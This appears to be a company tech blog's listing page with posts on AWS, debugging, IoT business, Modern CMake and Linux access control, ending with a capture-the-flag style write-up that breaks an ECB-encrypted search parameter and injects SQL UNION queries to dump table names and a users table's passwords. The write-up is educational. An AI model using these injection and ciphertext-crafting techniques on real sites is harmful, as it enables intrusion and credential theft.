Programmering

An Introduction to AWS Cloud Development

22 oktober, 2019 by Scionova

My experience from Cloud Development

Roughly one year ago I began developing in AWS (Amazon Web Services). I could then immediately see what all the buzz was about. AWS, and other Cloud platform providers (Azure, GCP etc.), supplies an immense amount of services. These services include both managed and unmanaged, from completely serverless to a provided dedicated server. One where the customer has (almost) complete control. These services provide the tools to develop a scalable, secure, agile and cost-efficient application where hardware, servers and OS management can be abstracted away to allow more focus on the actual code of your application.

In the past year I have been involved in the development of a microservice in AWS, and the past month have been spent on preparation for, and later passing, the AWS Certified Solutions Architect – Associate exam.

What problems could be solved by using a Cloud Platform?

Imagine that you are part of a start-up aiming to develop a platform that provides a marketplace for autonomous car owners to make their vehicle available for hire when they are not using it themselves. Traditionally, starting the development of the application requires servers to run the application and databases, as well as other hardware, e.g. network equipment to enable connection to the internet.

As development continues, changes in requirements might need additional hardware to be purchased or existing hardware to be replaced. Building tools and other CI-related tools are required to ensure the quality of your platform, all which need their own servers. Moving the solution to production might require another set of equipment with capacity to handle spikes in the load of a production environment.

To minimize downtime of the platform, back-up servers will have to be purchased. All this equipment is associated with a capital investment which might not be available for your start-up without the assistance of an external investor. In the cloud, services are paid for in a pay-as-you-go model. No up-front investment is required, which better fits the financial situation of your start-up.

Serverless Architecture

For the last couple of years, ‘Serverless’ has had a huge impact on the industry. But what does it really mean to have a Serverless Architecture? Traditionally, applications have been installed on a specific physical server, where everything from hardware to application requires maintenance. With a serverless architecture, the only concern for the developer is the code of the application. The rest is left to the cloud provider to maintain. Of course, this does not mean that code is not running on a server, only that it is not important which server the code runs on.

Other than reduced maintenance, a serverless architecture brings automated scaling of your environment, a cost model that depends on the actual utilization of the services and a more microservice-friendly infrastructure.

AWS Services

These are some AWS services which could provide an entry point for someone who wants to get acquainted with the AWS ecosystem:

AWS CloudFormation (https://aws.amazon.com/cloudformation) – An effective tool to describe your AWS infrastructure resources as code (YAML, JSON) in CloudFormation templates. This enables you to store the specification of your entire infrastructure in version control. When changes are made to the template, CloudFormation will calculate the delta from the deployed set of resources into a change set and thereafter execute the change set. Having your infrastructure as code is also crucial when managing multiple staging environments (Dev, QA, Prod etc.) where it is important that the environments are identical to facilitate code and infrastructure quality assurance. An alternative to CloudFormation is Terraform, which is an open-source, platform independent tool to describe infrastructure (https://www.terraform.io).

AWS Lambda (https://aws.amazon.com/lambda) – This is the core of any serverless application developed in AWS. A Lambda basically consists of the code that you want to execute and something that triggers it, e.g. an API is called, or a database table is updated. When the Lambda is triggered the supplied code is deployed and executed and shortly after the execution is finished the deployment will be removed. Any parallel triggering of a Lambda will result in multiple deployments of the code and this will scale infinitely. The cost of a Lambda is based on the number of executions and a combination of the execution time and the amount of memory that is allocated for the Lambda code.

Amazon EC2 (https://aws.amazon.com/ec2) – Elastic Compute Cloud – EC2 is a service that provides a virtual machine, or “instance”, on a server in AWS. When deploying an instance, it is possible to choose from an abundance of instance types and pre-configured operating systems with different application-setups. An instance type can be anything from cheaper general-purpose instances to more expensive instances, e.g. an instance equipped with more graphics resources to enable more graphics-intensive workloads or machine learning workloads. Each instance type also has several different sizes to support workloads of varying load.

Amazon VPC (https://aws.amazon.com/vpc) – Virtual Private Cloud – VPC is used to set up a network in AWS. The network can then be equipped with subnets with different CIDRs, NAT gateways, Internet Gateways, Load Balancers, services to connect the network to an on-premise network etc. All without setting up any hardware yourself. EC2 instances can be deployed in public and private subnets to provide a tiered application setup where database instances and back-end instances (in the private subnet) are only accessible through the front-end instances (in the public subnet).

Amazon ECS (https://aws.amazon.com/ecs) – Elastic Container Service – A container orchestration service provided by AWS that supports docker containers. The service is available in two modes, EC2 and Fargate. The EC2 mode requires the developer to manage the EC2 instances that the containers run on as well as the scaling of the number of the instances, while the Fargate mode is fully managed in this regard. An open-source alternative to Amazon ECS is Kubernetes (https://kubernetes.io).

Amazon DynamoDB (https://aws.amazon.com/dynamodb) – DynamoDB is a fully managed NoSQL database that provides great performance and is highly scalable. DynamoDB together with AWS Lambda and Amazon API Gateway (https://aws.amazon.com/api-gateway) provides all the tools required to build a small, simple and completely serverless microservice. A NoSQL database is an excellent fit for applications with well-defined database access patterns, i.e. the queries that will be executed are known at the design phase and the NoSQL table(s) can be designed thereafter. However, for applications with more ad hoc database access patterns a SQL database would be a better choice. This session from AWS re:Invent 2018 (https://www.youtube.com/watch?v=HaEPXoXVf2k) makes a deep dive into DynamoDB and explains when a NoSQL database should be utilized.

Amazon S3 (https://aws.amazon.com/s3) – Simple Storage Service – A managed object storage service which provides a whopping 99.999999999% of durability for any stored object, which is achieved by storing the objects in multiple data centers across a Region (a Region comprises a set of Availability Zones, which in turn comprises a set of data centers). S3 is used for storing different types of files, e.g. videos, images and documents. Some features of S3 includes versioning of objects, replication of objects to another AWS Region, archiving objects to cheaper storage options when the object is no longer frequently accessed (e.g. Amazon S3 Glacier https://aws.amazon.com/glacier), hosting static web content etc.

Some things to be aware of

As mentioned, cloud development offers lots of opportunities moving forward. However, there are some things to take into consideration when deciding on whether to move your solution to the cloud. Platform lock-in is one thing. Deciding on a cloud provider will most likely make you dependent on that company’s solution, which will make you vulnerable to any changes in price or functionality of the used services.

Another consideration is the difference in price model from traditional development. Services in the cloud, especially managed services, are often priced per invocation and/or per unit of data transferred/processed/stored. This model might not suit solutions that have an even, non-fluctuating load over time, in that case a fleet of EC2-instances could be a better fit. Neglecting this detail when designing a solution could result in unnecessarily high costs for the solution.

Being well-prepared when designing a solution is key to avoid these pitfalls. The AWS Well-Architected Framework (https://aws.amazon.com/architecture/well-architected) provides some guidelines on how to architect a solution with performance, security, cost etc. in mind.

If you are interested in starting your journey in the cloud in general and AWS in particular and are eager to learn more about the possibilities and risks of cloud development, do not hesitate to contact me at Daniel.Andersson@scionova.com.

Debug your way to understanding

24 september, 2019 by Scionova

If it’s not already, this blogpost will give you some practical tips on how to make your debugger your best friend. If you are new on the job and thrown into a big legacy system, it can sometimes be really difficult to understand the flow of the code. Even when you are familiar with the codebase a particularly complicated piece of code may leave you stumped. A debugger can be a helpful tool to understand what is happening and where information stems from. Going back to the basics and really getting to know how the debugger(s) in your IDE(s) work can be a real boost.

This blog post is not supposed to be a tutorial for any one IDE. Instead I will go through debugging concepts that are present in most IDE, as well as some nifty tricks found in specific debugging tools. I am most familiar with the Eclipse debugging tool, so most of my references will point to there. However, the concepts that I cover are present in most debugging tools.

Get to know your break points

Debugging is stepping through your code, line for line, while being able to monitor the changes in variables in your code. Most of the time you are not interested in each and every line of code. You are interested in a specific part of the code or a specific variable. As such, you want to be able to tell your debugger when it should pause execution for closer inspection. You do this with breakpoints.

The most basic breakpoint will simply stop the execution at the given line; however, you can do much more with breakpoints! One of my mostly used breakpoints is the conditional breakpoint. As the name suggests it will halt execution when a given condition is met or when a value changes. This allows you to focus on what is really important.

A really helpful break point is the exception breakpoint. If you have no idea why an exception is thrown and you want to find out the cause, exception breakpoints will halt execution right when the exception is triggered. It is then easy to see what triggers the exception, and what the cause of that trigger is.

If you are working with a multi-threaded application and you want to follow the execution of a specific thread, you may want to filter a breakpoint on a specific thread. Then you can follow the execution of that thread without having to worry about being confused by another thread.

You can also do some additional things with breakpoints, such as suspending execution when the breakpoint has been hit a certain number of times or suspend all breakpoints until a certain breakpoint has been reached.

Get to know the controls

When you have reached the code of interest for debugging, you may want to follow the execution more closely. To do this you have some progression controls at your disposal.

The basic progression controls for debugging are fairly self-explanatory. The step into option will go into the statement you are currently at. The step over option in contrast, will jump over the statement and show you the result after. This means that if you choose to step over a big method, you do not have to follow it through the entire method, you will only see the result.

The final basic progression tool is the step return, which will take you out to the caller of the current statement. If you are in a method this would mean that you would go to the place where the method was called.

A lesser known, but very useful progression option is the drop to frame option. Using this will take you back to the beginning of the current frame you are in. In the case of a method, this would mean you will be taken back to the very top of the method. This can be very useful while finding out where an issue originates from. You might step over a piece of code with the step over function and find that a method call is the root of your error. Unfortunately, step back is generally not an option while debugging. Drop to frame will take you back to the beginning of the code piece you are currently in though, and you can choose to go into the statement that caused the error again.

The drop to frame option is also very useful if your IDE and debugger allows for hot changes. That is, they allow you to change the code while debugging without having to recompile and rerun your application. If you are working on a big project that takes a long time to compile or run this can be a great time-saver. In Eclipse while working with Java, you can do code changes that do not affect method headers and similar big changes. After doing a change and saving you will automatically be brought to the top of frame, allowing very quick feedback for your change.

If you are working with applications that might be triggered by another application, you may think that you cannot debug your application properly. These kinds of situations can be really difficult, as it is not the application that you want to debug that drives the execution. However, if you are developing in Visual Studio you are in luck! Visual Studio allows you to attach a process to your debug session. This will in turn trigger the execution in the application you are debugging. To do this go to Debug > Attach to process and select the process to which you want the debugger to attach.

Make friends

While debugging may seem basic, and the prospect of debugging your own or others code may be daunting, I have found that it really helps me understand the applications that I am developing. While I was still a student, I rarely saw the use of the debugger, it was mostly just a bothersome tool that never wanted to work for me.

When I started working in a bigger project with more complicated data structures I realized how useful it can be. Getting familiar with the tools and options available to me showed me how essential good debugging skills are to my work as a developer. It takes some getting used to, but as the saying goes, practice makes perfect, and these days the debugger is my most beloved development tool. I hope this blogpost has given you some food for thought and might have introduced some concepts that you were not aware of before.

Best regards ,

Lisa

IoT… as a Business Approach.

12 augusti, 2019 by Scionova

We are living in a turbulent world where competition is becoming hyperturbulent. New and existing companies must take the job seriously of continually initiating and adjusting to the new Industry 4.0. Internet of Things (IoT) technology is causing an immense disruption across many industries with the pace of change increasing every day. However not everything is related to high tech connected solutions or state-of-the-art technology developments, IoT business is more than that.

Cutting edge technology…just one more player.

We all take for granted that our TV is connected to the internet, our smartphone communicates with our watch, the smart indoor heating system always delivering the perfect temperature (especially in the freezing Swedish winter) and so on. Yes, Internet has given unlimited access to data and technology for most of the world’s population. But technology is not the only main player to develop an IoT business and monetize from its benefits.

The innovation should not be only in technology, it should also consider the development of a new business model and delivery method of IoT services for other organizations and end-customers. Technology can give us a lot of possibilities of creating innovative solutions, but if we cannot materialize it into a business, then a great business might stay as a great design only. IoT business encompasses additional critical players, that together create the perfect match to embark into the “IoT journey”.

The center of attention on technology for IoT services means that the business aspects are often overlooked. Successful IoT services are built on a premise of a clearly defined service offering complimented with operational and business models. There is a tendency to treat each of these views in isolation, but effective IoT services onboard these models in parallel.

Cultural (tech) fact:

Did you know that the concept of a smart IoT device was introduced back in 1982? It was with a modified Coke machine at Carnegie Mellon University (Pittsburg, USA) becoming the first Internet-connected appliance. This Coke machine had the ability to report its inventory and whether newly loaded drinks were cold.

Image result for modified Coke machine

The Business of IoT.

I remember a conference where the speaker said: “If you haven’t started in the IoT, you are already late”. That is not completely accurate. IoT will be “alive” for a long time and we need to take advantage of this with new IoT services, ideas and business models. You will never be too late with innovative ideas and IoT offers a vast of possibilities.

The basic components around a business are: a good product, a reliable business model and customers. For the latter, we have and plenty of them (at least in terms of connected devices). Intel, for instance, projects a device penetration to grow from 2 billion in 2006 to 200 billion by 2020, which means to nearly 26 smart devices for each human on Earth. Others, as Gartner who is taking smartphones, tablets and computers out of the equation, estimates 20,8 billion connected devices by 2020.

Hence we need to understand the business aspects of the disruption caused by IoT and how to take advantage of the coming opportunities.

Technology is only one of many tools to be used to develop successful, profitable and sustainable IoT business. There is literature explaining different aspects to consider when developing IoT services to create successful IoT business; but I would like to mention two that I consider the most important:

Ecosystems:

In simple words, for IoT to reach its full potential, it will require several ecosystems and currently “non-cooperating” industries to work together to maximize business.

IoT as a Service (AaS):

Or as “pay-as-you-grow” model in which customer pays proportional to the usage of the service. This enables initial low investment, scalability and cost controlling.

IoT business is not about technology solely, it is a series of multiple aspects to consider that must be attended in parallel. Many of the IoT projects/business are condemned to fail as profitable business if people within the organizations do not consider business relevant aspects as important as technology development during the entire lifecycle product management.

Best regards,

Why not not Modern CMake

28 juni, 2019 by Scionova

Lately I have worked a lot with the build framework/system in the project of my current assignment in automotive. Doing so I have noticed the benefit of writing CMake conforming with what is called ‘Modern CMake’, or rather the draw backs of not doing it. Therefore, I’d like to take the opportunity to share my experience.

This will not be a complete description of what Modern CMake is, there are loads of articles about that, and here is a good entry point to Modern CMake. However, I’ll give you a few Do’s and Don’ts along with the issues I had when these were not followed. But my main advice is to think of CMake as any other production code and demand quality, readability and maintainability.

Do not use global functions such as include_directories or link_libraries. These often shroud what targets actually use and need. Use functions as target_include_directories and target_link_libraries to modify each target explicitly instead.
Do not modify the CMAKE_CXX_FLAGS in subprojects. The project might change to a compiler that do not support all the flags the old did. This kind of variable should be modified on the top level CMakeLists.txt or preferably in a toolchain file.

Use ALIAS targets so that add_subdirectory and find_package exports the same name for targets. The issue I saw in my current project was when we started to build an external library instead of using prebuilds (or vice versa), and the target_link_libraries of all the dependent components needed to be updated.
Do not use target_inlude_directories with paths reaching outside the directory of the component. The project might change its file structure and all these paths need to be updated. Instead, export the needed header files from the other component, either with target_include_directories with PUBLIC properties or simply export an INTERFACE library.
Provide well defined and documented functions for adding tests on a project level. The main benefit is that it is easier to change the behaviour of the tests and how they are used in CI Gates if naming conventions and label use are centrally enforced/implemented once.
Use cmake_parse_arguments when implementing custom functions. Implementing the same functionality, yourself might introduce unnecessary complexity or obscurity.
Do not overdo the use of variables. When debugging CMake and/or the binaries, it might prove challenging to expand all the variables in your head.

Further Reading

As I mentioned before, there a multitude of articles about Modern CMake and how to follow it, and here are some of them:

More Modern CMake

Hope you enjoyed my blog post!

Best Regards,

Patrik Ingmarsson

Securing Linux with Mandatory Access Control

8 april, 2019 by Abhijeet Shirolikar

Security is a growing problem for any software. Now and then new software vulnerabilities even in Linux kernel are reported.

Effective use of access control provided by the operating system can assist to mitigate software vulnerabilities. Mostly, people are familiar with Discretionary Access Control (DAC) available in UNIX like operating systems.

DAC restricts access to resources based on users and/or groups they belong. E.g. owner of a file can set read, write and execute permissions and so a user is in control of who can access and modify a resource. In other words, access to a resource is at the user’s discretion.

This creates a problem where a compromised program inherits access controls of the user and so can-do things that users can do. If a compromised process happens to be running with effective superuser privileges, an attacker can take full control of the system. This is undesired, to say the least.

Instead of deciding what a program can and cannot do based on DAC measures, it is more secure to let programs only do what they need to perform their tasks. So even if a program runs with effective root privileges, it cannot do anything other than it is allowed to do. This type of control over capabilities and permissions is called Mandatory Access Control (MAC).

Mandatory Access Control (MAC) uses Linux Security Modules (LSM) integrated into the kernel. LSM is a generic framework such that different MAC extensions can be implemented by loading a different kernel module. Modules rely on kernel hooks which in turn allow them to extend kernel’s behavior.

System call executed by a user process traverses through kernel’s existing logic for resource lookup, error check, and DAC check. Given all checks are passed, before kernel grants access to the resource, LSM hook makes a call to active security policy to consult if access should be denied or granted.

Some of the hooks provided by LSM are,

Module hooks – to provide control over module loading and unloading
Network hooks – to provide control over sockets, transport layer, network layer etc.
Task Hooks – to provide control over the lifecycle of a task
Virtual File system hooks – to provide control over superblock, inode, and actual file operations.
IPC hooks – to provide control over IPC mechanisms like message queues, shared memory, and semaphores

MAC extension developers can then use these hooks to implement the logic to extend/implement access control.

Some of the accepted official Linux kernel MAC extensions are Security Enhanced Linux (SELinux), Simplified Mandatory Access Control Kernel (SMACK), Application Armor (AppArmor), etc.

In the next blog post, I will write about my experiences with SELinux.

Best Regards,

Abhijeet Shirolikar, Senior Software Developer

Wargames – A web Application Hack

22 februari, 2019 by Scionova

$> WARGAMES

Even though my daily work usually has little to do with security, I consider it a virtue to keep up to date with security basics and to try to maintain a certain breadth in my technical knowledge.

But perhaps more importantly, I find it to be a lot of fun to engage in what’s known as “wargames” – simulated hacking challenges which test one’s skills and reasoning.

If you’re a programmer with a knack for security you might have heard of the term “CTF” or “Capture The Flag” – events where individuals or teams compete to be the first to solve a set of challenges. Wargames are essentially the same, but without the time limit typically associated with CTFs and many of them are focused on learning basic techniques rather than having to figure out novel approaches to convoluted problems.

$> THE FLAVOUR OF THE DAY: WEB

As one might expect, there are many kinds of wargames. Common broad themes include web applications, cryptography and binary exploitation (abusing buffer overflows and alike). Harder wargames can require knowledge of many different topics and obscure language and/or configuration features.

I’m terrible with the web software stack and have therefore been afraid of trying web-themed wargames for a long time. I finally decided to change that by learning a bit and seeing how far I get. This post describes my way through one particularly interesting challenge I recently encountered after succeeding with some easier ones.

WARNING: Contains spoilers for a single level in a specific web wargame. It’s not the only writeup of this level, but you might still want to avoid reading if that sounds like something you’ll want to be doing by yourself.

$> GOAL

The goal of this challenge is simple: get the password to the next level. We know that the password can be found in the file /etc/passwords/password29 on the server if we can access it somehow, or it might be stored in some additional place we can get our hands on.

Let’s get right on it!

$> POKING AROUND

We land on a webpage that seems to host some sort of joke database. There appears to be a search feature which accepts input from us, and a notice proclaiming that this time we won’t be seeing the source code for the application we’re exploiting. Awww.

Let’s see what happens when we input some things manually…

hilarious_joke

It’s hilarious!

The normal use seems simple enough: there exists a database of jokes, and we can search for text contained in them. Up to three are randomly picked if our query matches several entries.
After some trial and error, it seems like the application gracefully handles the good old SQL injection workhorses – quotes, dashes, pound signs and what have you.

But the URL looks interesting. And if something stands out in a wargame, it probably is.

If we manually mess with this URL, we get an interesting error.

padding_error

A cursory DDG search reveals that this problem is usually related to AES encryption. That’s a good pointer.

$> SITEMAP

Based on what happens with our input and what we can see from the source code of the webpages, this is the sitemap we get:

http://site.name/ (same as index.php) http://site.name/index.php http://site.name/search.php

The input box on index.php results in a HTTP POST request to search.php which eventually gets redirected to a HTTP GET with a transformed query parameter.

Otherwise there’s little of interest that we can glean from the source code of the pages.

(Also, calling search.php without parameters yields a cryptic result: just the string “mep”. This led me on a wild goose chase for a *.pem file (crypto certificate) that I half expected to be able to find. I can’t know for sure there isn’t one, but my time was certainly wasted. This can be interpreted as the site admins being cruel, or me being stupid – the latter of which is a terrible thought to entertain.)

$> STUDYING THE RESULTING URLS

Inputting the string ‘aaaaaaaaaaaa’ as query yields the following URL:
http://site.name/search.php?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA%2B2078pAPR3X9UET9Bj0m9rt%2Fc0tByJk%3D

Let’s pick out the query part:
G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA%2B2078pAPR3X9UET9Bj0m9rt%2Fc0tByJk%3D

And urldecode it:
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA+2078pAPR3X9UET9Bj0m9rt/c0tByJk=

Alphanumeric, with the addition of plus signs and slashes and equal signs at the end? Looks like base64.
Just decoding it to stdout messes up my terminal, so we’re looking at binary data. Let’s get a hexdump instead:

00000000: 1be8 2511 a7ba 5bfd 578c 0eef 466d b59c ..%...[.W...Fm.. 00000010: dc84 728f dcf8 9d93 751d 10a7 c75c 8cf2 ..r.....u....\.. 00000020: c087 2dee 8bc9 0b11 5691 3b08 a223 a39e ..-.....V.;..#.. 00000030: ce82 a955 3b65 b812 80fb 6d3b f290 0f47 ...U;e....m;...G 00000040: 75fd 5044 fd06 3d26 f6bb 7f73 4b41 c899 u.PD..=&...sKA..

Yikes, I can’t make heads or tails out of it!

Trying out more human-pseudo-random values with a quick and dirty bash/curl script gives the following bits of knowledge:

The initial 32 bytes are always the same.
The output is deterministic (the same input always results in the same output).
Curiously, a string consisting of just a bunch of percent signs results in jokes being displayed despite not containing percent signs.

$> CIPHER MODE DISCOVERY

Eventually, I ended up trying a really long repetition of a single character as input.
The result was the following:

00000000: 1be8 2511 a7ba 5bfd 578c 0eef 466d b59c ..%...[.W...Fm.. 00000010: dc84 728f dcf8 9d93 751d 10a7 c75c 8cf2 ..r.....u....\.. 00000020: c087 2dee 8bc9 0b11 5691 3b08 a223 a39e ..-.....V.;..#.. 00000030: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X... 00000040: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X... 00000050: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X... 00000060: b4ed a087 d3c0 bea2 bedc 1b61 40b9 e2eb ...........a@... 00000070: ca8c f4e6 1091 3aba e39a 0676 1920 4a5a ......:....v. JZ

This is really good information – it reveals that blocks are independently encrypted (Electronic CodeBook mode rather than Cipher Block Chaining), and are 16 bytes (128 bits) long.

$> CRACKING THE KEY

Yet another search engine query, this time on the subject of cracking 128 bit ECB AES, reveals that without more information about the key it would take approximately “Forever” to do that. It’s unlikely that we have that much time at our disposal so let’s look elsewhere.

$> CIPHERTEXT LAYOUT

We can now, however, figure out the layout of the ciphertext. (This is also where I moved from my shoddy shell script to the modern world with python3 and requests to better be able to automate it.)

I inserted ‘a’ characters one at a time until obtaining the first instance of the now familiar ciphertext of a block of 16 ‘a’ characters. This happened after 26 characters. We know from earlier that that two first 16 byte blocks are always the same, so there are six unknown bytes in the third.

Moving on from there, I inserted more ‘a’ characters until the ciphertext length increased by one block. This happened after three more characters. As per the specification of PKCS#7, if the length of the source mod the block size is zero, a full block of padding needs to be added. That means that three bytes in the last block earlier were just padding.

(Also that netted us the ciphertext of a valid padding-only block that we can use later.)

Putting all of this together, the result is as follows:

Legend: P = unknown prefix a = our query string S = unknown suffix

PPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPP PPPPPPaaaaaaaaaa aaaaaaaaaaaaaaaa SSSSSSSSSSSSSSSS SSSSSSSSSSSSS

While we can’t really know what the unknown parts are, it’d be reasonable to guess that in one way or another they’re related to querying a database, be it SQL or some clever php grepping in a directory with plain text files.

$> DECIPHERING THE TAIL (FAIL)

With this recent knowledge in hand, it seems straightforward enough to figure out the suffix:

By reducing the length of our input by one, we should get the ciphertext for the following:

PPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPP PPPPPPaaaaaaaaaa aaaaaaaaaaaaaaaS -- b'abc123...' SSSSSSSSSSSSSSSS SSSSSSSSSSSS

Then, if we extend our input by one byte, iteratively trying out values for all possible bytes until we get the same ciphertext, we should be able to decipher the data one byte at a time.

Unfortunately, for mysterious reasons, this seemed to only work for a single byte (‘%’ – a percent sign) and then nothing would yield a matching ciphertext. I dabbled a while trying to figure out whether I had messed up something with my URL-encoding or so… but to no avail.

At this point I was at my wit’s (and weekend’s) end and let the problem rest for a few days.

$> A GIFT FROM THE GODS

While doing completely unrelated things at work, I stumbled across a SQL query like this:
"SELECT thing FROM things WHERE content LIKE 'prefix_%'"

And I remembered the recent percent sign oddity, and the one from the start of the challenge and suddenly everything fell into place. And by everything I mean both the realization of me clearly needing to study more SQL and what seems to be happening behind the scenes in the challenge.

(For reference: ‘%’ acts as a wildcard for ‘zero or more characters’ in SQL like. Underscores match a single character, and I could quickly verify that our query treated these characters exactly so.)

We can now have a proper qualified guess at what’s hidden in the ciphertext:

SELECT * FROM JO KES WHERE JOKE L IKE '%aaaaaaaaaa aaaaaaaaaaaaaa%' COLLATE latin1_ general_cs_as

(Database people might observe that parts of this guess are very likely way off, but it’s good enough to get us moving forward.)

Come weekend, I leaped back into the fray.

$> CRAFTING

We now have a way forward – conceptually as easy as your run of the mill SQL injection, we just have to mold our payload into a format that the application accepts.

So let’s make some blocks. We’ll craft something like this:

Legend: P = unknown prefix a = our padding and canaries Q = the input we want ciphertext for S = unknown suffix

PPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPP PPPPPPaaaaaaaaaa aaaaaaaaaaaaaaaa QQQQQQQQQQQQQQQQ aaaaaaaaaaaaaaaa SSSSSSSSSSSSSSSS SSSSSSSSSSSSS

So for example, if we want the ciphertext for “16 BYTES OF JUNK”, we send in a query string like:

“aaaaaaaaaaaaaaaaaaaaaaaaaa16 BYTES OF JUNKaaaaaaaaaaaaaaaa”

And we should get a result with ciphertext blocks like:

... b'b39038c28df79b65d26151df58f7eaa3' (canary) b'deadbeefdeadbeefdeadbeefdeadbeef' (what we want) b'b39038c28df79b65d26151df58f7eaa3' (canary) ...

And we can keep saving values for interesting 16 byte blocks to be used in our payload.

It turns out, however, that some inputs corrupt the canary value after our expected 16 byte ciphertext block – most noticeably quotes and backslashes. As is customary, it’s time to guess why. I’d fathom a likely candidate is that before our query is encrypted, mysqli_real_escape_string is called on the input.

That means we can’t easily place quotes in the middle of a block. But we can feed this to the application:

aaaaaaaaaaaaaaa' DataDataDataDat

To produce a ciphertext equivalent of:

aaaaaaaaaaaaaaa\ 'DataDataDataDat

Like so:

crafting_ciphertext

That’ll be enough for our purposes.

$> THE ATTACK

We now know how to craft our own ciphertexts and have a good idea of what the backend is doing.
We also observe that we can ignore the suffix of the query and replace it with the full padding block ciphertext we acquired earlier to shorten our query a bit and not have the suffix interfere with our experiments.

At this point I attempted many times to craft something useful and failed for various more or less stupid reasons. But since I’m writing this from a retrospective angle, I can pretend that I immediately arrived at this point:

SELECT * FROM JO -- b'1be8251117ba5bfd578c0eef466db59c' KES WHERE JOKE L -- b'dc84728fd2f89d93751d10a7c75c8cf2' IKE '%aaaaaaaaaa -- b'c0872dee8b390b1156913b08a223a39e' ' UNION SELECT -- b'36c550994e94298f5a065ac38ea9cbd7' 1;# -- b'9fb2c82683985bd21224f4a1dd70507e' <16 byte pad> -- b'75fd5044fd063626f6bb7f734b41c899'

If we concatenate those values, base64-encode the block, URL-encode the result, and send it to search.php, we get the following:

sql_fun

Looks very promising!

Let’s proceed:

SELECT * FROM JO -- b'1be8251117ba5bfd578c0eef466db59c' KES WHERE JOKE L -- b'dc84728fd2f89d93751d10a7c75c8cf2' IKE '%aaaaaaaaaa -- b'c0872dee8b390b1156913b08a223a39e' ' UNION SELECT -- b'36c550994e94298f5a065ac38ea9cbd7' table_name FROM -- b'49628aa9ea9f5f088b720ba991d91dc5' information_sche -- b'0329a1abfe5c16ae68ce04abf9a935c8' ma.tables;# -- b'3f74e043974e647b303b0c3e1cec6604' <16 byte pad> -- b'75fd5044fd063626f6bb7f734b41c899'

Bingo!
We get the entire list of table names. Two stand out: ‘jokes’ and ‘users’.

Let’s skip the jokes prefix too (and fixing the error I got when my query result no longer contained a joke column):

SELECT column_na -- b'0bb623e8185083eb808d997e9dc9edc4' me as joke from -- b'8e934d7e5200d5d5cda7344f3f9b7f3c' informat -- b'eb8b19c46430e317918ce1727a6350e1' ion_schema.colum -- b'ab1cb043f4546efcc1d8f97b217bcf2d' ns where table_n -- b'44bd82dfac975e1d5f5c1aa784985be2' ame LIKE -- b'7427adc2fafca6f328e5845b4c75d912' 'users%%%%%%%%%% -- b'cc221115d011307f2515496e360fa96b' ';# -- b'0018ad0c0200bda82423885bea3701fa' <16 byte pad> -- b'75fd5044fd063626f6bb7f734b41c899'

We get:
username password

Finally:

select username -- b'2e935761dedf092525f2259d8444df3e' as joke from use -- b'13b7a41e291aafeff2ebb88c17fd1c5a' rs union select -- b'ebd89e1563dc499ce3140dc21567240d' password from us -- b'8c11f169f048c2b9ef2739011035e2b0' ers;# -- b'4cf81cbe37c5a5fac50c72e64c37fd8b' <16 byte pad> -- b'75fd5044fd063626f6bb7f734b41c899'

sql_injection_win

And we have completed the objective of the challenge: the username is “root@kali” and the secret password is “that is not how you specify the port”.

$> CONCLUSIONS

If you’ve read this far you’ve probably concluded that the challenge was not very realistic and the vulnerability could’ve been mitigated or prevented in multiple ways:

Using different databases for login data and other, non-critical data
Crafting the final SQL query closer to the database, making it difficult to bypass mysqli_real_escape_string
Avoiding printing detailed error messages to the end user
Using a modern mode of encryption (CBC) instead of deprecated ECB
Not giving the end user direct access to the ciphertext

(Arguably there is little need for the extra encryption and data forwarding layer here at all, but let us assume that it is an unavoidable Business Requirement from upper management).

But all of that is beside the point! We explored, tried things, learned things and persisted until we found something that worked. Realistic scenario or not, that’s the workflow which yields results. And we had a lot of fun along the way, didn’t we?

If you think you might be interested in trying out some wargaming, here’s a good collection of sites that might be interesting:
https://www.wechall.net/active_sites
Everyone has their own preferences, so pick your poison and dive right in. If you don’t like a certain site, try another. If you’re very new, expect to be struggling a lot at the start – but there’s no need to rush, and indeed, you shouldn’t.

That’s all from me – hope you enjoyed the read and/or learned something!

Hugs,
Chrys

An Introduction to AWS Cloud Development

My experience from Cloud Development

What problems could be solved by using a Cloud Platform?

Serverless Architecture

AWS Services

Some things to be aware of

Debug your way to understanding

Get to know your break points

Get to know the controls

Make friends

IoT… as a Business Approach.

Cutting edge technology…just one more player.

Cultural (tech) fact:

The Business of IoT.

Ecosystems:

IoT as a Service (AaS):

Why not not Modern CMake

Securing Linux with Mandatory Access Control

Wargames – A web Application Hack

Göteborgskontoret

Varbergskontoret

Gasell

Programmering

My experience from Cloud Development

What problems could be solved by using a Cloud Platform?

Serverless Architecture

AWS Services

Some things to be aware of

Get to know your break points

Get to know the controls

Make friends

Cutting edge technology…just one more player.

Cultural (tech) fact:

The Business of IoT.

Ecosystems:

IoT as a Service (AaS):

Footer

Göteborgskontoret

Varbergskontoret

Gasell